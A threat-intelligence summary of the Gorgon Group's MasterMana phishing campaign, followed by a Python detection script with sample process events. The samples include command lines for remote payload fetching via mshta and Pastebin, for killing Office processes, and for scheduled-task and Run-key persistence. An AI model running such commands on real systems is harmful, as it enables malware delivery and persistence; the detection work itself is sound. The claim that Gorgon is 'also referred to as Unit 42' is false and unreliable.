Gorgon Group: The Gorgon Group has been identified with high confidence by researchers at Prevailion to be behind the MasterMana campaign. The group is using the campaign to deliver the Azorult Trojan and RevengeRAT (Remote Access Trojan) to victims via phishing emails. Gorgon is a known state-sponsored group that is believed to be connected to Pakistan and is also referred to as Unit 42. The newest campaign is seen as primarily focused on financial gain and is delivered to victims through a phishing email carrying a Microsoft Excel attachment, which drops a VBS script payload. The script opens a BlogSpot website that launches the Microsoft HTML Application Host (MSHTA) utility, which in turn opens a second payload hosted on Pastebin. The second payload is designed to kill any running Microsoft Excel, Word, PowerPoint and Publisher processes and to set up scheduled tasks and registry keys for persistence. From here, two different cases are possible. In one instance, the campaign delivers RevengeRAT, which is capable of opening remote shells, allowing an attacker to manage system files and services, edit the Windows registry, log keystrokes, access the webcam, and harvest credentials. In the other case, the campaign drops the Azorult Trojan, which is designed to exfiltrate as much sensitive information from victims as possible, including, but not limited to, banking credentials, cryptocurrency wallets and files, passwords, browser history, and cookies. According to Prevailion, the group struck a “perfect balance” in this campaign, making it small enough to go undetected while still operating at a high rate.
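The chain described above (Excel spawning a script host, mshta.exe fetching a payload from a blog or paste site, Office processes being killed, then scheduled-task and Run-key persistence) is made up of process-creation events that a defender can match individually and then correlate per host. The following is an added example, not code from the original write-up or from Prevailion: a small rule set run over constructed Sysmon-style process events. The host names, user paths, task name and URLs in the sample events are invented for the example; only the pastebin.com and blogspot.com domains, the Office process names and the persistence mechanisms come from the description above.

```python
"""Detection rules for the MasterMana-style process chain described above.

Events are modelled after Sysmon EventID 1 (process creation) with the parent
and child image reduced to a lower-case basename. All sample data is constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass
class ProcEvent:
    host: str      # workstation the event came from
    parent: str    # parent image basename, lower-case
    image: str     # child image basename, lower-case
    cmdline: str   # full command line of the child


OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "mspub.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
# Payload staging sites named in the campaign description.
PASTE_HOSTS = re.compile(r"https?://[^\s\"']*(pastebin\.com|blogspot\.com)", re.I)
# HKCU/HKLM ...\CurrentVersion\Run autostart key.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run", re.I)


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every rule that fires for one event (empty if none)."""
    hits = []
    cl = ev.cmdline.lower()
    # Stage 1: an Office application launching a script host (Excel -> VBS).
    if ev.parent in OFFICE and ev.image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Stage 2: mshta.exe pulling content from a blog/paste site.
    if ev.image == "mshta.exe" and PASTE_HOSTS.search(ev.cmdline):
        hits.append("mshta_remote_paste_payload")
    # Stage 3: the second payload terminating Office processes.
    if ev.image == "taskkill.exe" and any(o in cl for o in OFFICE):
        hits.append("office_process_kill")
    # Persistence: scheduled task creation or a Run-key write.
    if ev.image == "schtasks.exe" and "/create" in cl:
        hits.append("schtasks_create")
    if ev.image == "reg.exe" and " add " in cl and RUN_KEY.search(ev.cmdline):
        hits.append("run_key_persistence")
    return hits


def correlate(events: Iterable[ProcEvent], threshold: int = 2) -> Dict[str, List[str]]:
    """Group rule hits per host; report hosts where at least `threshold` distinct
    rules fired. A single hit (e.g. a lone schtasks /create) is too noisy on its
    own, but two or more stages of this chain on one host is worth an alert."""
    per_host: Dict[str, set] = {}
    for ev in events:
        for rule in classify(ev):
            per_host.setdefault(ev.host, set()).add(rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= threshold}


# Constructed sample events: ws01 shows the full chain, ws02 is benign activity.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "explorer.exe", "excel.exe", r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xls'),
    ProcEvent("ws01", "excel.exe", "wscript.exe", r"wscript.exe C:\Users\alice\AppData\Local\Temp\inv.vbs"),
    ProcEvent("ws01", "wscript.exe", "mshta.exe", "mshta.exe http://example-stage.blogspot.com/p/page.html"),
    ProcEvent("ws01", "mshta.exe", "mshta.exe", "mshta.exe https://pastebin.com/raw/EXAMPLEID"),
    ProcEvent("ws01", "mshta.exe", "taskkill.exe",
              "taskkill /f /im winword.exe /im excel.exe /im powerpnt.exe /im mspub.exe"),
    ProcEvent("ws01", "mshta.exe", "schtasks.exe",
              'schtasks /create /sc minute /mo 30 /tn "ExampleTask" /tr "mshta.exe https://pastebin.com/raw/EXAMPLEID"'),
    ProcEvent("ws01", "mshta.exe", "reg.exe",
              r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ExampleTask /t REG_SZ /d "mshta.exe https://pastebin.com/raw/EXAMPLEID"'),
    ProcEvent("ws02", "explorer.exe", "excel.exe", r'"EXCEL.EXE" C:\Users\bob\Documents\budget.xlsx'),
    ProcEvent("ws02", "svchost.exe", "schtasks.exe", "schtasks /query /fo LIST"),
]

if __name__ == "__main__":
    for host, rules in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(rules)}")
```

In a real deployment the events would come from a SIEM query over Sysmon or EDR telemetry rather than an in-memory list; the point of `correlate` is that each stage alone (a script host under Excel, a `schtasks /create`) produces false positives, while two or more stages on the same host within a short window is a strong signal for this chain.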
With all the news around COVID-19/Coronavirus, the average person is turning to the internet for